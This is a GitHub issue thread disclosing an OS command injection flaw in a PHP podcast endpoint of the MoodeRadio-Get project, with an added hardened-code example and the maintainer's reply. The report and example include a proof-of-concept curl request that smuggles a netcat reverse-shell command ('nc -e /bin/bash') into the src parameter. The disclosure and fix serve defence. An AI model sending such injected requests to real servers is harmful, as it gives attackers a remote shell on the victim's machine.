duracell80 / MoodeRadio-Get

Package Manager for Moode Audio Radio Stations
GNU General Public License v3.0
16 stars 2 forks

OS command injection vulnerability #7

Closed jasperla closed 3 years ago

jasperla commented 3 years ago

Hi,

It seems there's an OS command injection vulnerability through the $src parameter with podcasts.

In scripts/make-radio-manager/radio/sources/pod/index.php there is this construct:

$src = $_GET["src"];

/* snip */

$runcmd = "python " . $apiPath . "/pod2m3u.py " . $src . " " . $name . " " . $items;
shell_exec($runcmd);

Note that $src is not escaped and as such can be abused to execute arbitrary commands on the OS as the user running the web server. For example to establish a reverse shell back to the attacker:

curl 'http://moode/radio/sources/pod?type=podcast&src=;nc%20-e%20/bin/bash%20127.0.0.1%204444;&items=20&name=skynews&interlude=1'

Sanitizing $src through escapeshellarg() would remedy this problem.
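
As an added example (not code from the MoodeRadio-Get project or from this report), here is the concatenation from the snippet above beside a hardened version of the same command builder. The function names and the $apiPath value are hypothetical; the hardened version assumes that pod2m3u.py expects a feed URL, a short station name and an item count, which the three trailing arguments suggest but the issue does not confirm. Note that $name and $items are concatenated raw in the same way as $src, so they get the same treatment here.

```php
<?php
// Added example; not the project's own code. Helper names and the path below are assumptions.
declare(strict_types=1);

/** Vulnerable construction: every parameter is concatenated raw into the shell string. */
function build_pod_cmd_unsafe(string $apiPath, string $src, string $name, string $items): string
{
    return "python " . $apiPath . "/pod2m3u.py " . $src . " " . $name . " " . $items;
}

/**
 * Hardened construction: validate each parameter against what pod2m3u.py is
 * assumed to accept (feed URL, station name, item count), then pass every
 * argument through escapeshellarg() so the shell sees each one as a single
 * quoted word. Returns null when a parameter is rejected, so nothing reaches
 * shell_exec() in that case.
 */
function build_pod_cmd_safe(string $apiPath, string $src, string $name, string $items): ?string
{
    // Feed source: absolute http(s) URL only (assumption about pod2m3u.py's input).
    if (filter_var($src, FILTER_VALIDATE_URL) === false
        || !in_array(parse_url($src, PHP_URL_SCHEME), ['http', 'https'], true)) {
        return null;
    }
    // Station name: letters, digits, dash and underscore; it likely ends up in a file name.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        return null;
    }
    // Item count: positive integer with a sane upper bound.
    if (!ctype_digit($items) || (int)$items < 1 || (int)$items > 500) {
        return null;
    }
    // escapeshellarg() wraps each value in single quotes and escapes any
    // embedded single quote, so ';', '&', '|' and whitespace lose their meaning.
    return 'python ' . escapeshellarg($apiPath . '/pod2m3u.py') . ' '
        . escapeshellarg($src) . ' '
        . escapeshellarg($name) . ' '
        . escapeshellarg($items);
}

$apiPath = '/var/www/radio/sources/pod';        // assumed path, for the demonstration only
$payload = ';nc -e /bin/bash 127.0.0.1 4444;';  // the src value from the report

// The unsafe builder hands the shell three separate commands: the script, nc, and an empty one.
echo 'unsafe: ' . build_pod_cmd_unsafe($apiPath, $payload, 'skynews', '20') . PHP_EOL;

// The safe builder rejects the payload at the URL check.
$rejected = build_pod_cmd_safe($apiPath, $payload, 'skynews', '20');
echo 'safe (payload): ' . ($rejected === null ? 'rejected before reaching shell_exec()' : $rejected) . PHP_EOL;

// A legitimate feed URL passes and is emitted as four single-quoted arguments.
echo 'safe (feed):    ' . build_pod_cmd_safe($apiPath, 'https://example.com/feed.xml', 'skynews', '20') . PHP_EOL;
```

The validation step is what stops the payload here; even with validation removed, escapeshellarg() would turn the whole `;nc -e ...;` value into one literal argument to pod2m3u.py rather than a second command. On PHP 7.4 and later, passing the command to proc_open() as an array avoids invoking a shell at all, which removes the need for quoting entirely.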

duracell80 commented 3 years ago

Thank you for the report, I've updated that and added a readme note on how to install the podcast library for Python.

I did notice while poking at the podcaster that the image path change bug is also affecting this too. Will open a new ticket there.